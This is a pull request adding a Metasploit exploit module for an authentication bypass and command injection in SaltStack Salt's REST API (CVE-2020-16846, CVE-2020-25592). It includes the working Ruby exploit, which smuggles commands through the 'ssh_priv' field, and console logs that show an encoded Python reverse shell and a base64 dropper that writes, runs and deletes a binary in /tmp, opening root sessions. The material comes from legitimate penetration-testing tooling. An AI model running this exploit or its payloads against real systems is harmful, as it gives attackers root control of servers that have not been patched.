### PR TITLE
Add SaltStack Salt REST API RCE (CVE-2020-16846 and CVE-2020-25592)

### DIFF
--- a/documentation/modules/exploit/linux/http/saltstack_salt_api_cmd_exec.md
+++ b/documentation/modules/exploit/linux/http/saltstack_salt_api_cmd_exec.md
@@ -1,0 +1,154 @@
+## Vulnerable Application
+
+### Description
+
+This module exploits an authentication bypass and command injection in
+SaltStack Salt's REST API to execute commands as the root user.
+
+The following versions have received a patch: 2015.8.10, 2015.8.13,
+2016.3.4, 2016.3.6, 2016.3.8, 2016.11.3, 2016.11.6, 2016.11.10,
+2017.7.4, 2017.7.8, 2018.3.5, 2019.2.5, 2019.2.6, 3000.3, 3000.4,
+3001.1, 3001.2, and 3002.
+
+Tested against 2019.2.3 from Vulhub and 3002 on Ubuntu 20.04.1.
+
+### Setup
+
+Follow the setup guide in
+[documentation/modules/exploit/linux/misc/saltstack_salt_unauth_rce.md](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/linux/misc/saltstack_salt_unauth_rce.md#setup).
+
+## Verification Steps
+
+Follow [Setup](#setup) and [Scenarios](#scenarios).
+
+## Targets
+
+### 0
+
+This executes a Unix command.
+
+### 1
+
+This uses a Linux dropper to execute code.
+
+## Scenarios
+
+### SaltStack Salt 2019.2.3 from Vulhub
+
+```
+msf6 > use exploit/linux/http/saltstack_salt_api_cmd_exec
+[*] Using configured payload cmd/unix/reverse_python_ssl
+msf6 exploit(linux/http/saltstack_salt_api_cmd_exec) > options
+
+Module options (exploit/linux/http/saltstack_salt_api_cmd_exec):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+   RPORT      8000             yes       The target port (TCP)
+   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
+   SRVPORT    8080             yes       The local port to listen on.
+   SSL        true             no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
+   TARGETURI  /                yes       Base path
+   URIPATH                     no        The URI to use for this exploit (default is random)
+   VHOST                       no        HTTP server virtual host
+
+
+Payload options (cmd/unix/reverse_python_ssl):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST                   yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Unix Command
+
+
+msf6 exploit(linux/http/saltstack_salt_api_cmd_exec) > set rhosts 127.0.0.1
+rhosts => 127.0.0.1
+msf6 exploit(linux/http/saltstack_salt_api_cmd_exec) > set lhost 192.168.1.7
+lhost => 192.168.1.7
+msf6 exploit(linux/http/saltstack_salt_api_cmd_exec) > run
+
+[+] python -c "exec(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zLHNzbApzbz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSkKc28uY29ubmVjdCgoJzE5Mi4xNjguMS43Jyw0NDQ0KSkKcz1zc2wud3JhcF9zb2NrZXQoc28pClh5PUZhbHNlCndoaWxlIG5vdCBYeToKCWRhdGE9cy5yZWN2KDEwMjQpCglpZiBsZW4oZGF0YSk9PTA6CgkJWHkgPSBUcnVlCglwcm9jPXN1YnByb2Nlc3MuUG9wZW4oZGF0YSxzaGVsbD1UcnVlLHN0ZG91dD1zdWJwcm9jZXNzLlBJUEUsc3RkZXJyPXN1YnByb2Nlc3MuUElQRSxzdGRpbj1zdWJwcm9jZXNzLlBJUEUpCglzdGRvdXRfdmFsdWU9cHJvYy5zdGRvdXQucmVhZCgpICsgcHJvYy5zdGRlcnIucmVhZCgpCglzLnNlbmQoc3Rkb3V0X3ZhbHVlKQo=')[0]))"
+[*] Started reverse SSL handler on 192.168.1.7:4444
+[*] Executing Unix Command for cmd/unix/reverse_python_ssl
+[*] Executing command: python -c "exec(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zLHNzbApzbz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSkKc28uY29ubmVjdCgoJzE5Mi4xNjguMS43Jyw0NDQ0KSkKcz1zc2wud3JhcF9zb2NrZXQoc28pCmZhPUZhbHNlCndoaWxlIG5vdCBmYToKCWRhdGE9cy5yZWN2KDEwMjQpCglpZiBsZW4oZGF0YSk9PTA6CgkJZmEgPSBUcnVlCglwcm9jPXN1YnByb2Nlc3MuUG9wZW4oZGF0YSxzaGVsbD1UcnVlLHN0ZG91dD1zdWJwcm9jZXNzLlBJUEUsc3RkZXJyPXN1YnByb2Nlc3MuUElQRSxzdGRpbj1zdWJwcm9jZXNzLlBJUEUpCglzdGRvdXRfdmFsdWU9cHJvYy5zdGRvdXQucmVhZCgpICsgcHJvYy5zdGRlcnIucmVhZCgpCglzLnNlbmQoc3Rkb3V0X3ZhbHVlKQo=')[0]))"
+[*] Command shell session 1 opened (192.168.1.7:4444 -> 192.168.1.7:64795) at 2020-11-11 01:55:12 -0600
+
+id
+uid=0(root) gid=0(root) groups=0(root)
+uname -a
+Linux c861a41f03f1 4.19.76-linuxkit #1 SMP Tue May 26 11:42:35 UTC 2020 x86_64 GNU/Linux
+```
+
+### SaltStack Salt 3002 on Ubuntu 20.04.1
+
+```
+msf6 > use exploit/linux/http/saltstack_salt_api_cmd_exec
+[*] Using configured payload cmd/unix/reverse_python_ssl
+msf6 exploit(linux/http/saltstack_salt_api_cmd_exec) > set target Linux\ Dropper
+target => Linux Dropper
+msf6 exploit(linux/http/saltstack_salt_api_cmd_exec) > options
+
+Module options (exploit/linux/http/saltstack_salt_api_cmd_exec):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+   RPORT      8000             yes       The target port (TCP)
+   SSL        true             no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
+   TARGETURI  /                yes       Base path
+   URIPATH                     no        The URI to use for this exploit (default is random)
+   VHOST                       no        HTTP server virtual host
+
+
+Payload options (linux/x64/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST                   yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   1   Linux Dropper
+
+
+msf6 exploit(linux/http/saltstack_salt_api_cmd_exec) > set rhosts 127.0.0.1
+rhosts => 127.0.0.1
+msf6 exploit(linux/http/saltstack_salt_api_cmd_exec) > set lhost 192.168.1.7
+lhost => 192.168.1.7
+msf6 exploit(linux/http/saltstack_salt_api_cmd_exec) > run
+
+[*] Started reverse TCP handler on 192.168.1.7:4444
+[*] Executing Linux Dropper for linux/x64/meterpreter/reverse_tcp
+[*] Generated command stager: ["echo -n f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAAeABAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAEAAOAABAAAAAAAAAAEAAAAHAAAAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAAAA+gAAAAAAAAB8AQAAAAAAAAAQAAAAAAAASDH/aglYmbYQSInWTTHJaiJBWrIHDwVIhcB4UWoKQVlQailYmWoCX2oBXg8FSIXAeDtIl0i5AgARXMCoAQdRSInmahBaaipYDwVZSIXAeSVJ/8l0GFdqI1hqAGoFSInnSDH2DwVZWV9IhcB5x2o8WGoBXw8FXmp+Wg8FSIXAeO3/5g==>>'/tmp/rhOKr.b64' ; ((which base64 >&2 && base64 -d -) || (which base64 >&2 && base64 --decode -) || (which openssl >&2 && openssl enc -d -A -base64 -in /dev/stdin) || (which python >&2 && python -c 'import sys, base64; print base64.standard_b64decode(sys.stdin.read());') || (which perl >&2 && perl -MMIME::Base64 -ne 'print decode_base64($_)')) 2> /dev/null > '/tmp/OwIzx' < '/tmp/rhOKr.b64' ; chmod +x '/tmp/OwIzx' ; '/tmp/OwIzx' & sleep 2 ; rm -f '/tmp/OwIzx' ; rm -f '/tmp/rhOKr.b64'"]
+[*] Executing command: echo -n f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAAeABAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAEAAOAABAAAAAAAAAAEAAAAHAAAAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAAAA+gAAAAAAAAB8AQAAAAAAAAAQAAAAAAAASDH/aglYmbYQSInWTTHJaiJBWrIHDwVIhcB4UWoKQVlQailYmWoCX2oBXg8FSIXAeDtIl0i5AgARXMCoAQdRSInmahBaaipYDwVZSIXAeSVJ/8l0GFdqI1hqAGoFSInnSDH2DwVZWV9IhcB5x2o8WGoBXw8FXmp+Wg8FSIXAeO3/5g==>>'/tmp/rhOKr.b64' ; ((which base64 >&2 && base64 -d -) || (which base64 >&2 && base64 --decode -) || (which openssl >&2 && openssl enc -d -A -base64 -in /dev/stdin) || (which python >&2 && python -c 'import sys, base64; print base64.standard_b64decode(sys.stdin.read());') || (which perl >&2 && perl -MMIME::Base64 -ne 'print decode_base64($_)')) 2> /dev/null > '/tmp/OwIzx' < '/tmp/rhOKr.b64' ; chmod +x '/tmp/OwIzx' ; '/tmp/OwIzx' & sleep 2 ; rm -f '/tmp/OwIzx' ; rm -f '/tmp/rhOKr.b64'
+[*] Transmitting intermediate stager...(126 bytes)
+[*] Sending stage (3008420 bytes) to 192.168.1.7
+[*] Command Stager progress - 100.00% done (833/833 bytes)
+[*] Meterpreter session 1 opened (192.168.1.7:4444 -> 192.168.1.7:64780) at 2020-11-11 01:53:05 -0600
+
+meterpreter > getuid
+Server username: root @ 4af10b3f4a2a (uid=0, gid=0, euid=0, egid=0)
+meterpreter > sysinfo
+Computer     : 172.17.0.2
+OS           : Ubuntu 20.04 (Linux 4.19.76-linuxkit)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter >
+```

--- a/modules/exploits/linux/http/saltstack_salt_api_cmd_exec.rb
+++ b/modules/exploits/linux/http/saltstack_salt_api_cmd_exec.rb
@@ -1,0 +1,137 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::AutoCheck
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'SaltStack Salt REST API Arbitrary Command Execution',
+        'Description' => %q{
+          This module exploits an authentication bypass and command injection in
+          SaltStack Salt's REST API to execute commands as the root user.
+
+          The following versions have received a patch: 2015.8.10, 2015.8.13,
+          2016.3.4, 2016.3.6, 2016.3.8, 2016.11.3, 2016.11.6, 2016.11.10,
+          2017.7.4, 2017.7.8, 2018.3.5, 2019.2.5, 2019.2.6, 3000.3, 3000.4,
+          3001.1, 3001.2, and 3002.
+
+          Tested against 2019.2.3 from Vulhub and 3002 on Ubuntu 20.04.1.
+        },
+        'Author' => [
+          'KPC', # CVE-2020-16846 (ZDI-CAN-11143)
+          'wvu' # Exploit
+        ],
+        'References' => [
+          ['CVE', '2020-16846'], # Command injection
+          ['CVE', '2020-25592'], # Auth bypass
+          ['URL', 'https://www.saltstack.com/blog/on-november-3-2020-saltstack-publicly-disclosed-three-new-cves/']
+        ],
+        'DisclosureDate' => '2020-11-03', # Vendor advisory
+        'License' => MSF_LICENSE,
+        'Platform' => ['unix', 'linux'],
+        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
+        'Privileged' => true,
+        'Targets' => [
+          [
+            'Unix Command',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/reverse_python_ssl'
+              }
+            }
+          ],
+          [
+            'Linux Dropper',
+            {
+              'Platform' => 'linux',
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'Type' => :linux_dropper,
+              'DefaultOptions' => {
+                'CMDSTAGER::FLAVOR' => :bourne,
+                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
+              }
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'SSL' => true
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+
+    register_options([
+      Opt::RPORT(8000),
+      OptString.new('TARGETURI', [true, 'Base path', '/'])
+    ])
+  end
+
+  def check
+    res = execute_command('')
+
+    unless res
+      return CheckCode::Unknown('Target did not respond to check.')
+    end
+
+    # Server: CherryPy/18.6.0
+    unless res.headers['Server']&.match(%r{^CherryPy/[\d.]+$})
+      return CheckCode::Unknown('Target does not appear to be running Salt.')
+    end
+
+    # {"return": [{}]}
+    unless res.code == 200 && res.get_json_document['return'] == [{}]
+      return CheckCode::Safe('Auth bypass failed.')
+    end
+
+    CheckCode::Vulnerable('Auth bypass successful.')
+  end
+
+  def exploit
+    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
+
+    case target['Type']
+    when :unix_cmd
+      execute_command(payload.encoded)
+    when :linux_dropper
+      execute_cmdstager(background: true)
+    end
+  end
+
+  def execute_command(cmd, _opts = {})
+    vprint_status("Executing command: #{cmd}") unless cmd.empty?
+
+    # https://docs.saltstack.com/en/latest/ref/netapi/all/salt.netapi.rest_cherrypy.html#post--run
+    # https://github.com/saltstack/salt/pull/58871
+    send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'run'),
+      'ctype' => 'application/json',
+      'data' => {
+        'client' => 'ssh',
+        'tgt' => '*',
+        'fun' => rand_text_alphanumeric(8..42),
+        'eauth' => rand_text_alphanumeric(8..42), # Auth bypass
+        'ssh_priv' => "/dev/null < /dev/null; (#{cmd}) & #" # Command injection
+      }.to_json
+    )
+  end
+
+end

--- a/modules/exploits/linux/misc/saltstack_salt_unauth_rce.rb
+++ b/modules/exploits/linux/misc/saltstack_salt_unauth_rce.rb
@@ -54,6 +54,8 @@ class MetasploitModule < Msf::Exploit::Remote
           [
             'Master (Python payload)',
             'Description' => 'Executing Python payload on the master',
+            'Platform' => 'python',
+            'Arch' => ARCH_PYTHON,
             'Type' => :python,
             'DefaultOptions' => {
               'PAYLOAD' => 'python/meterpreter/reverse_https'
@@ -62,6 +64,8 @@ class MetasploitModule < Msf::Exploit::Remote
           [
             'Master (Unix command)',
             'Description' => 'Executing Unix command on the master',
+            'Platform' => 'unix',
+            'Arch' => ARCH_CMD,
             'Type' => :unix_cmd,
             'DefaultOptions' => {
               'PAYLOAD' => 'cmd/unix/reverse_python_ssl'
@@ -70,6 +74,8 @@ class MetasploitModule < Msf::Exploit::Remote
           [
             'Minions (Python payload)',
             'Description' => 'Executing Python payload on the minions',
+            'Platform' => 'python',
+            'Arch' => ARCH_PYTHON,
             'Type' => :python,
             'DefaultOptions' => {
               'PAYLOAD' => 'python/meterpreter/reverse_https'
@@ -78,6 +84,8 @@ class MetasploitModule < Msf::Exploit::Remote
           [
             'Minions (Unix command)',
             'Description' => 'Executing Unix command on the minions',
+            'Platform' => 'unix',
+            'Arch' => ARCH_CMD,
             'Type' => :unix_cmd,
             'DefaultOptions' => {
               # cmd/unix/reverse_python_ssl crashes in this target


### PR DESCRIPTION
```
msf6 exploit(linux/http/saltstack_salt_api_cmd_exec) > info

       Name: SaltStack Salt REST API Arbitrary Command Execution
     Module: exploit/linux/http/saltstack_salt_api_cmd_exec
   Platform: Unix, Linux
       Arch: cmd, x86, x64
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2020-11-03

Provided by:
  KPC
  wvu <wvu@metasploit.com>

Module side effects:
 ioc-in-logs
 artifacts-on-disk

Module stability:
 crash-safe

Module reliability:
 repeatable-session

Available targets:
  Id  Name
  --  ----
  0   Unix Command
  1   Linux Dropper

Check supported:
  Yes

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT      8000             yes       The target port (TCP)
  SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
  SRVPORT    8080             yes       The local port to listen on.
  SSL        true             no        Negotiate SSL/TLS for outgoing connections
  SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
  TARGETURI  /                yes       Base path
  URIPATH                     no        The URI to use for this exploit (default is random)
  VHOST                       no        HTTP server virtual host

Payload information:

Description:
  This module exploits an authentication bypass and command injection
  in SaltStack Salt's REST API to execute commands as the root user.
  The following versions have received a patch: 2015.8.10, 2015.8.13,
  2016.3.4, 2016.3.6, 2016.3.8, 2016.11.3, 2016.11.6, 2016.11.10,
  2017.7.4, 2017.7.8, 2018.3.5, 2019.2.5, 2019.2.6, 3000.3, 3000.4,
  3001.1, 3001.2, and 3002. Tested against 2019.2.3 from Vulhub and
  3002 on Ubuntu 20.04.1.

References:
  https://cvedetails.com/cve/CVE-2020-16846/
  https://cvedetails.com/cve/CVE-2020-25592/
  https://www.saltstack.com/blog/on-november-3-2020-saltstack-publicly-disclosed-three-new-cves/

msf6 exploit(linux/http/saltstack_salt_api_cmd_exec) >
```